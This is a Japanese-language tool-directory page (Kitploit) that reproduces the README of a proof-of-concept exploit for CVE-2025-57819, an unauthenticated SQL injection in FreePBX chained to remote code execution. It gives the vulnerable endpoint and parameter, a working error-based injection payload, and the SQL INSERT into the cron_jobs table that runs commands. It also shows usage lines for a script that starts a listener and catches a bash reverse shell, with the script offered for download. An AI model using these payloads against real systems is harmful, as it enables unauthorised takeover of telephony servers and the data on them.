Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
ツール/GitHubGitHub/b4sh2/cve-2025-57819-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

リポジトリを見る
72573ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-57819 — FreePBX 未認証SQLi → RCE

FreePBX Endpoint Manager の未認証SQLインジェクション(CVE-2025-57819)を利用したワンショットエクスプロイトで、FreePBX cron_jobs テーブルを介したリモートコード実行に連鎖させます。

許可されたセキュリティテスト / CTF 使用のみを対象としています。


脆弱性

エンドポイントモジュールのajaxハンドラは brand パラメータをSQLクエリに直接連結し、モジュールパス FreePBX\modules\endpoint\ajax はajaxのReferrer/認証チェックをバイパスします。これにより、EXTRACTVALUE を用いた未認証のエラーベースSQLインジェクションが可能になり、スタッククエリによる書き込みも有効になります。

インジェクションポイント:

GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

エラーベースの読み出しの例:

brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}

影響を受けるバージョン: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3。

RCEの手法

このインジェクション単体では読み取り専用ですが、スタッククエリにより書き込みが可能です。FreePBXは cron マネージャを介して cron_jobs テーブルからジョブを実行するため、行を挿入することで任意のコマンド実行が可能になります(約60秒以内、スケジュール * * * * *):

INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

挿入されるコマンドはbashリバースシェルです。cron行は最初のコールバック後に自動的に削除され、繰り返しの接続を防ぎます。

必要条件

pip install requests urllib3

Python 3。内蔵のIP検出(-i/--interface)はLinuxのみ対応。他のプラットフォームでは--ipを使用してください。

使用方法

# デフォルト: インターフェイス tun0、ポート 4444 — リスナー開始、エクスプロイト、シェル起動
python3 exploit.py http://{target}

# 別のインターフェイス/ポートを指定
python3 exploit.py http://{target} -i eth0 -p 9001

# リスナーIPを明示的に指定
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

スクリプトの動作:

  1. SQLiを確認(DBバージョンを漏洩)。
  2. 指定ポートでTCPリスナーを起動。
  3. リバースシェルのcronジョブを注入し、行が挿入されたことを確認。
  4. 約70秒待機しコールバックを受信後、対話型シェルに移行(自動PTYアップグレードを試行)。
  5. 注入されたcron行をクリーンアップ。

参考文献

  • Horizon3.ai — Updated FreePBX CVEs: Auth Bypass & RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • FreePBX advisory GHSA-m42g-xg4c-5f3h
ツールをダウンロード